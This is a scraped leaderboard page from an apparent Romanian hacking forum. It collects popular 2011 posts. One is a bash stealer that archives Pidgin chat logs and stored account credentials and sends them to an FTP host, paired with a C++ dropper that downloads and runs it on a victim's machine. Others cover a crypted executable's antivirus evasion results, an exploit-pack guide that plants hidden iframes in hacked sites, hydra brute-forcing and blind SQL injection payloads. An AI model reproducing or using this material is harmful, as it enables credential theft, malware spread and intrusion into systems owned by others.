Leaderboard
Popular Content
Showing content with the highest reputation on 12/04/11 in all areas
-
Avem o surs? mic? (virgul?) care preia datele de la Pidgin (http://rstcenter.com/forum/43047-sh0rt-line-c0de-3.rst#post296355) ?i un script c++ care are rolul de a induce victima-n eroare. M? exprim ca naiba, da' în?elege?i voi. pidgin-getdata @ http://sprunge.us/FQPV #!/bin/bash cd $HOME/.purple/ UDIRX='pwd' HOST='www.site.ro' FUSER='ftpuser' PASSWD='ftppasswd' tar -cf $USER.tar 'logs/' 'accounts.xml' ftp -n -v $HOST << EOT ascii user $FUSER $PASSWD prompt mkdir $USER cd $USER mput $USER.tar $UDIRX bye EOT rm -rf $USER.tar steal.cpp #include <iostream> #include <stdlib.h> using namespace std; int main() { system("wget http://sprunge.us/FQPV"); system("chmod +x FQPV"); system("./FQPV"); system("rm -rf FQPV"); return 0; } Compila?i scriptul c++ cu link-ul vostru, rescrie?i numele la fi?ier, apoi pune?i victima s? ruleze. Mic, de c?cat, dar util. // ? Urc? arhiva .tar în directorul curent. Arhiva având ca nume user-ul logat. Pwd este pentru a printa directorul curent. // Nu este nevoie. Eu am folosit g++ -o stealer fisier.cpp ?i nu are nevoie de drept de execu?ie.2 points
-
Stiti voi ce este .. Download link: Prima data e criptat cu "X" apoi "rezultatul" criptat cu Y si KeyPass "BULLSHIT" fara ghilimele. File Info Report date: 2011-12-03. Scan Occured: Link to scan: http://my-avscan.com/result.php?scan=Mjk5ODU1 File name: crypted.exe File size: 1432064 bytes MD5 Hash: 004b8b2e02630b0fa253b316c9ada81c SHA1 Hash: 9c18c25030fdfa9ec735139c7c807adbf47f2843 Detection rate: 3 out of 35 Status: INFECTED Detections AVG - Found Luhe.Packed.H. Acavir - Clean. Avast 5 -Clean. Avast -Clean. Avira -Clean. BitDefender -Clean. VirusBuster Internet Security -Clean. Clam Antivirus -Clean. COMODO Internet Security -Clean. DrWeb -Clean. eTrust-Vet -Clean. F-PROT Antivirus -Clean. F-Secure Internet Security -Clean. G Data -Clean. IKARUS Security-Clean. Kaspersky Antivirus -Clean. McAfee -Generic Dropper.mk. MS Security Essentials -Clean. ESET NOD32 -Clean. Norman -Clean. Norton -Clean. Panda Security -Clean. A-Squared Security -Clean. Quick Heal Antivirus -Clean. Rising Antivirus -Clean. Solo Antivirus -Clean. Sophos -Mal/DotNet-C. Trend Micro Internet Security -Clean. VBA32 Antivirus -Clean. Vexira Antivirus -Clean. Webroot Internet Security -Clean. Zoner AntiVirus -Clean. Ad-Aware -Clean. AhnLab V3 Internet Security -Clean. Bullguard -Clean. Scan report generated by My-AVScan.com Cred ca depinde si de iconita rezultatul. SCANATI DOAR PE MY-AVSCAN.COM SAU NOVIRUSTHANKS. sursa1 point
-
1) Go to Qvuis (http://qvius.mail.everyone.net/email/scripts/loginuser.pl?EV1=13206360967351872) 2) Fill in the information 3) Say "No" to all the offers 4) Bam you got yourself a free .edu email Benefici: -Free stuff from here occasionally w/ .edu email. I got $5 star bucks once http://www.studentcoupons.com/ -Free amazon prime for 1 year and/or discounted rate http://www.amazon.com/gp/student/signup/info -Free microsoft software https://www.dreamspark.com/default.aspx -More Free Software http://students.autodesk.com -Double Drop Box Space Bonus http://dropbox.com/edu Free Pro Account http://promos.connectify.me/1 point
-
Brosix (formerly known as Brosix Corporate Instant Messenger) is a secure instant messenger that is designed to help users connect to each other. It uses 256-bits AES encryption in order to encrypt messages, thus ensuring their security. Brosix employs advanced Peer-to-peer technology to make sure the communication is routed directly between the users whenever possible. It also compresses the data so sending files is much faster with Brosix. Here are some key features of "Brosix": · Text chat with rich text formatting · Offline messages · Text Conference · Voice Chat · Video Chat · Voice Conference · Voice Mail · File Transfer · Co-Browse · Whiteboard · Screen Sharing · Private IM networking · Firewall friendly and true P2P communication · Encryption Requirements: · 128 MB RAM · 50 MB disk space · 800 MHz CPU or higher · Internet connection Availability Brosix works on many platforms. +Windows +Mac +Linux +Android +iPhone / iPad Download1 point
-
NetworkMiner is a Network Forensic Analysis Tool (NFAT) for Windows. NetworkMiner can be used as a passive network sniffer/packet capturing tool in order to detect operating systems, sessions, hostnames, open ports etc. without putting any traffic on the network. NetworkMiner can also parse PCAP files for off-line analysis and to regenerate/reassemble transmitted files and certificates from PCAP files. NetworkMiner collects data (such as forensic evidence) about hosts on the network rather than to collect data regarding the traffic on the network. The main user interface view is host centric (information grouped per host) rather than packet centric (information showed as a list of packets/frames). NetworkMiner has, since the first release in 2007, become popular tool among incident response teams as well as law enforcement. NetworkMiner is today used by companies and organizations all over the world. NETRESEC NetworkMiner - The Network Forensics Analysis Tool This video was made to show some of the extra features of NetworkMiner Professional, like Pcap-over-IP, running on OS X under Mono, Export results to CSV / Excel, Geo IP localization, Host coloring support, and Command line scripting support. http://www.irongeek.com/i.php?page=videos/networkminer-professional1 point
-
This will give you a quick run down on how to brute force your router if it uses HTTP BASIC AUTH using THC-HYDRA If you receive a popup window when you try to access your router, then this method should work for you. hydra -l {username} -P {password list path} -s {port} {IP Address} http-get / My command looks like: hydra -l admin -P password.lst -s 80 192.168.1.2 http-get / Command break down: hydra --> the hydra program -l --> (lower case “L” not to be confused with a upper case i) single username to target. Use uppercase -L to specify a username list -P --> provide path to password lis. -p to try a single password ie “passw0rd” -s --> port to target your router may run on a different port such as 8080 {IP Address} hopefully this is clear http-get --> service to brute force “/” --> this specifies the page to target if this is left out the command will not run. “/” just indicates the root do not include the ” You will get an output line with username and password if you are successful. This attack is only as good as your dictionary.1 point
-
=========================== Indexed blind SQL injection =========================== :Author: gamma95 <gamma95 [at] gmail> and his minions Date: December 03, 2011 Time based blind SQL attack suffers from low bit/request ratio. Each request produces only one valuable bit of information. This paper describes a tweak that produces higher yield at the expense of longer runtime. Along the way, some issues and notes of applicability are also discussed. Background ++++++++++ Time based blind SQL injection attack is probably the most well-known technique in the planet. The method works by analyzing the time difference in various queries. Because query execution time is a side effect of a query, no visible output is required for this method to succeed. For example, a query could request that the DBMS to sleep for 10 seconds if the first character of the username is ``A``. Usually, time based technique go hand in hand with binary search. Instead of asking if the first character is ``1``, then ``2``, then ``3``, it could partition the possible values into two ranges (say from ``0`` to ``4`` and ``5`` to ``9``) and ask if the first character is less than ``5``. Depending on the result, it picks out the more likely range and repeats the process until there is only one possible value. This effectively puts a logarithmic bound on number of requests to the DBMS. In other words, each request gives us one bit of information. Increasing the usable bit/request ratio +++++++++++++++++++++++++++++++++++++++ Due to low bit/request ratio, an attack attempt usually leaves behind too many requests in access log. This is undesirable. A better approach could be to encode the correct value into query execution time itself. For example, if we know the value is a number from 0 to 9, we could ask DBMS to sleep for that many seconds straight. In this case, one request carries more than 3 bits of usable information. This is the principal idea behind our tweak. Indexed time based attack +++++++++++++++++++++++++ To encode more bits into the execution time, we must work with variable numeric delay values. Therefore, we need two things: + A measurable delay interval. Too short the interval and network latency could negatively affect our measurement. Too long the delay will also waste our time. + And its mapping to target values. A delay of one second could mean character ``A`` or it could also mean some other value, depending on the possible domain. These necessitate an array-like index search. Say, if our domain is ten (character) values from ``0`` to ``9``, then we can easily combine them into an array like shown below. :: 1 2 3 4 5 6 7 8 9 10 (index) | | | | | | | | | | v v v v v v v v v v +---+---+---+---+---+---+---+---+---+---+ | 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | (value) +---+---+---+---+---+---+---+---+---+---+ Given a random character, we can tell in one request if it is in this set, and if it is, what specific character it actually is. The way to do that is by delaying query time by the index of the character. If the input character is not in the set, there will be no delay. If it is, its index is determinable from the sleep time. An example ++++++++++ Suppose we are trying to grab version information from a **MySQL** server. Possible characters include 0-9 and period. Observe the execution time. :: select sleep(find_in_set(mid(@@version, 1, 1), '0,1,2,3,4,5,6,7,8,9,.')); 1 row in set (6.04 sec) # index 6, value '5' select sleep(find_in_set(mid(@@version, 2, 1), '0,1,2,3,4,5,6,7,8,9,.')); 1 row in set (11.00 sec) # index 11, value '.' select sleep(find_in_set(mid(@@version, 3, 1), '0,1,2,3,4,5,6,7,8,9,.')); 1 row in set (2.00 sec) # index 2, value '1' ... Each request gives us exactly one character (not bit). Notes of applicability ++++++++++++++++++++++ Adjusting sleep time ==================== Faster sleep time is easily achievable by multiplying the index with some factor smaller than 1. For example, we can sleep half the time as before:: select sleep(0.5 * find_in_set(mid(@@version, 1, 1), '0,1,2,3,4,5,6,7,8,9,.')); 1 row in set (3.00 sec) # index 6, value '5' Similarly, longer sleep time can use factors greater than 1. Guarding against network latency ================================ Time based attack generally works best in a fast and reliable networked environment. Small jitters in latency could skew the measurements and affect end result. However, this technique we are describing here could be modified to support network latency. The idea is that since sleeping time is a calculated number, we could add to it a fixed amount of time for latency, or prepend some invalid characters (such as ``a`` when the domain is 0-9) in the domain set. :: select sleep(find_in_set(mid(@@version, 1, 1), 'a,a,a,a,0,1,2,3,4,5,6,7,8,9,.')); 1 row in set (10.00 sec) # index 10, value '5' We can also sprinkle invalid characters in between valid characters to manually adjust amount of sleeping time. Picking an acceptable domain ============================ The set of possible values should be carefully picked to match the value that one expects. Wide domain (more values) has a better chance of catching the input, but it requires a longer sleep time on average. Narrow domain (less values) has slimmer chance to catch the input, but it generally finishes faster on average. Some web frameworks enforce a maximum execution time. A query that takes more than, say, 30 seconds will be prime target for an early termination (and possibly logging). Therefore, picking out an acceptable domain is not only an optimization but sometimes a necessity. Using other functions ===================== ``find_in_set`` is only one of the string search functions that MySQL supports. One can also use other functions such as ``instr``, ``locate``, and ``position``. Sleeping in ``WHERE`` clause ============================ Most of the time, the injection point is in a ``WHERE`` clause. Because the ``WHERE`` clause is tested against all candidate rows, we better make sure that there is only **one** candidate. We can do that by making sure the table scan produces one row. Otherwise, our sleep measure will be multiplied up by the number of candidates. :: create table test (a int primary key, b char(16)); insert into test values(1, 'abcd'); insert into test values(2, 'zyxw'); select count( * ) from test; +----------+ | count( * ) | +----------+ | 2 | +----------+ # we have 2 rows in table test select * from test where sleep(locate(mid(@@version, 1, 1), '0123456789.')); Empty set (12.00 sec) # here we sleep for 12 seconds because all (2) rows are tested select * from test where a=1 and sleep(locate(mid(@@version, 1, 1), '0123456789.')); Empty set (6.00 sec) # here we sleep for 6 seconds because only one row is tested Conclusion ++++++++++ This paper described a small tweak to the well-known time based SQL injection technique. The principle behind the increase in bit/request ratio is encoding more information in the query execution time. This is done with index based array search functions such as ``find_in_set``. The desirably smaller number of requests comes at the expense of generally longer execution time. This paper also discussed about some technical concerns that one must pay close attention to when employing the technique. Minute aspects such as table scan, applicable value domain, network latency, and amount of sleep time are at the top list to watch out for. Acknowledgement +++++++++++++++ Thanks go to Nam Nguyen for his early review and support.1 point
-
"The best guide to the Metasploit Framework." —HD Moore, Founder of the Metasploit Project The Metasploit Framework makes discovering, exploiting, and sharing vulnerabilities quick and relatively painless. But while Metasploit is used by security professionals everywhere, the tool can be hard to grasp for first-time users. Metasploit: The Penetration Tester's Guide fills this gap by teaching you how to harness the Framework and interact with the vibrant community of Metasploit contributors.Once you've built your foundation for penetration testing, you'll learn the Framework's conventions, interfaces, and module system as you launch simulated attacks. You'll move on to advanced penetration testing techniques, including network reconnaissance and enumeration, client-side attacks, wireless attacks, and targeted social-engineering attacks.Learn how to: [*=left]Find and exploit unmaintained, misconfigured, and unpatched systems [*=left]Perform reconnaissance and find valuable information about your target [*=left]Bypass anti-virus technologies and circumvent security controls [*=left]Integrate Nmap, NeXpose, and Nessus with Metasploit to automate discovery [*=left]Use the Meterpreter shell to launch further attacks from inside the network [*=left]Harness standalone Metasploit utilities, third-party tools, and plug-ins [*=left]Learn how to write your own Meterpreter post exploitation modules and scripts You'll even touch on exploit discovery for zero-day research, write a fuzzer, port existing exploits into the Framework, and learn how to cover your tracks. Whether your goal is to secure your own networks or to put someone else's to the test, Metasploit: The Penetration Tester's Guide will take you there and beyond. Download: http://www.4shared.com/document/FjsmhQyx/Metasploit_The_Penetration_Tes.html1 point
-
In case you aren't familiar with exploit packs they are browser exploit bundles you can use to drop whatever files you want to visitors of third-party sites. Keep in mind all the exploit packs listed are public which means their success rate is small (10% rate at best). Still if you inject this in a high traffic site that is still a good number of fresh targets. To use many of these you will need an ioncube loader on the server which you can get here.. http://www.ioncube.com/loaders.php Speaking of which you have two options available. You can either find a bulletproof host to host your exploit pack or host it locally on your machine. If you decide to host it yourself you should make it a hidden service. Here is a guide to setting one up safely.. https://hackbloc.org/sites/hackbloc.org/files/hidsec.pdf You can then use something like tor2web in order for the injection to function properly. When you hopefully have the exploit pack up and running you can either inject an iframe into pages on a hacked site or if you manage to drop a shell use the mass injection tool to autoinject every page.. <iframe src="http://your_url_here.tor2web.com" width="0" height="0" FRAMEBORDER="0" ></iframe> Keep in mind that if there is an exe in the exploit pack you downloaded DO NOT run it. Replace the exe with your file. Finally with all that explained here are the exploit packs: 0x88 Adpack Armitage Blackhole Bleeding Life v2 Cry217 Fiesta Firepack G-Pack IcePack IcePack Platinum Luiz Eleonore Multisploit My-Poly-Sploit Phoenix Rds Smartpack Target-Exploit Unique Pack X-Pack LINK : http://www.multiupload.com/PJ4NL3C3Q01 point